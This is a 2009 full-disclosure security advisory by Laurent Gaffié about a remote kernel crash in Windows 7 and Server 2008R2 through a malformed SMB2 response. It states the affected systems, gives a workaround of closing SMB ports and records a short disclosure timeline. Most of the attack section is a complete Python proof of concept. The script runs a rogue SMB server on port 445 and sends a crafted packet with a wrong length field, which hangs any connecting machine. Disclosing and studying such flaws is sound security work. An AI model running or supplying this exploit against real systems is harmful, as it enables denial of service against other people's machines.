=============================================<br>- Release date: November 11th, 2009<br>- Discovered by: Laurent Gaffié<br>- Severity: Medium/High<br>=============================================<br><br>I. VULNERABILITY<br>
-------------------------<br>Windows 7 * , Server 2008R2 Remote Kernel Crash<br><br>II. BACKGROUND<br>-------------------------<br>#FAIL,#FAIL,#FAIL<br>SDL FAIL, 'Most Secure Os Ever' --> Remote Kernel in 2 mn.<br>
#FAIL,#FAIL,#FAIL<br><br>III. DESCRIPTION<br>-------------------------<br>See : <a href="http://g-laurent.blogspot.com/">http://g-laurent.blogspot.com/</a> for much more details<br><br>#Comment: This bug is specific Windows 7/2008R2.<br>
<br>IV. PROOF OF CONCEPT<br>-------------------------<br>#win7-crash.py:<br>#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)<br>#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an infinite loop.<br>
#NO BSOD, YOU GOTTA PULL THE PLUG.<br>#To trigger it fast from the target: \\this_script_ip_addr\BLAH , instantly crash <br>#Author: Laurent Gaffié<br>#<br><br>import SocketServer<br><br>packet = "\x00\x00\x00\x9a" # ---> length should be 9e not 9a.. <br>
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"<br>"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"<br>"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"<br>
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"<br>"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"<br>"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"<br>
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"<br>"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"<br>"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"<br>
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"<br><br><br>class SMB2(SocketServer.BaseRequestHandler):<br><br> def handle(self):<br> <br> print "Who:", self.client_address<br>
input = self.request.recv(1024)<br> self.request.send(packet)<br> self.request.close()<br> <br>launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port 445<br>launch.serve_forever()<br>
<br>#SDL FAILED<br><br>V. BUSINESS IMPACT<br>-------------------------<br>An attacker can remotly crash any Windows 7/Server 2008R2.<br><br><br>VI. SYSTEMS AFFECTED<br>-------------------------<br>Windows 7, Windowns Server 2008R2<br>
<br>VII. SOLUTION<br>-------------------------<br>No patch available for the moment, your vendor do not care.<br>Close SMB feature and ports, until a real audit is provided.<br><br>VIII. REFERENCES<br>-------------------------<br>
<a href="http://blogs.msdn.com/sdl/">http://blogs.msdn.com/sdl/</a><br><a href="http://g-laurent.blogspot.com/">http://g-laurent.blogspot.com/</a><br><a href="http://twitter.com/g_laurent">http://twitter.com/g_laurent</a><br>
IX. CREDITS<br>-------------------------<br>This vulnerability has been discovered by Laurent Gaffié<br>Laurent.gaffie{remove-this}(at)<a href="http://gmail.com">gmail.com</a><br><br>X. REVISION HISTORY<br>-------------------------<br>
November 8th, 2009: MSRC contacted<br>November 8th, 2009: MSRC acknoledge the vuln<br>November 11th, 2009: MRSC try to convince me that multi-vendor-ipv6 bug shouldn't appears on a security bulletin.<br>November 11th, 2009: Win 7 remote kernel smash released<br>
<br>XI. LEGAL NOTICES<br>-------------------------<br>The information contained within this advisory is supplied "as-is"<br>with no warranties or guarantees of fitness of use or otherwise.<br>I accept no responsibility for any damage caused by the use or<br>
misuse of this information.<br><br>XII.Personal Notes<br>-------------------------<br>More Remote Kernel FD @MS to come.<br><br><br>